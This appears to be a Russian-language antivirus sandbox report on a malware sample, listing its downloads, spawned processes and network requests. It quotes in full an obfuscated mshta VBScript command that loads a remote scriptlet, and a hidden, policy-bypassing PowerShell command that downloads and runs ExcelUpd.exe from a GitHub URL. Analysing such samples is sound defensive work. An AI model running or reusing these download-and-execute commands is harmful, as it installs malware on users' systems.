Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- https://github.com/ecusembassy/kraken/raw/master/excelupd.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\mshta.exe' VBscriPt:clOsE (geTobJEct ("ScriPT:http://17#.#7.68.60/druid/files/NhDv2g7wsbG6_ewrfds") )
Сетевая активность
TCP
Запросы HTTP GET
- http://17#.#7.68.60/druid/files/NhDv2g7wsbG6_ewrfds
UDP
- DNS ASK gi##ub.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\mshta.exe' VBscriPt:clOsE (geTobJEct ("ScriPT:http://17#.#7.68.60/druid/files/NhDv2g7wsbG6_ewrfds") )' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/c pOwErsHELl.EXE -EX bypaSs -Nop -W 1 seT-COnTeNt -va ( NEW-OBjeCt NeT.WEbClient ).DoWnloAddATa( 'https://github.com/EcUSEmbassy/Kraken/raw/master/ExcelUpd.exe' ) ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' "/c pOwErsHELl.EXE -EX bypaSs -Nop -W 1 seT-COnTeNt -va ( NEW-OBjeCt NeT.WEbClient ).DoWnloAddATa( 'https://github.com/EcUSEmbassy/Kraken/raw/master/ExcelUpd.exe' ) ...
